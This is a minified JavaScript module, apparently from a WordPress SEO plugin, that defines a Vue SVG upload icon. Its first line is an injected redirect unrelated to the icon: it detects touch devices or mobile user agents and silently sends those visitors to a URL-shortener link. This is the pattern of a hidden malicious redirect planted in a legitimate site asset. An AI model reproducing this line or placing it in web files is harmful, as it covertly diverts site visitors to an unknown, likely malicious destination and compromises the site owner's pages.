(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{_ as o}from"./_plugin-vue_export-helper.eefbdd86.js";import{f as r,i as t,j as e}from"./vendor-vue-ui.232c7c36.js";const s={},l={viewBox:"0 0 24 25",fill:"none",xmlns:"http://www.w3.org/2000/svg",class:"aioseo-upload"};function a(c,n){return r(),t("svg",l,[...n[0]||(n[0]=[e("path",{"fill-rule":"evenodd","clip-rule":"evenodd",d:"M15 17V11H19L12 4L5 11H9V17H15ZM12 6.83L14.17 9H13V15H11V9H9.83L12 6.83ZM19 21V19H5V21H19Z",fill:"currentColor"},null,-1)])])}const p=o(s,[["render",a]]);export{p as S};
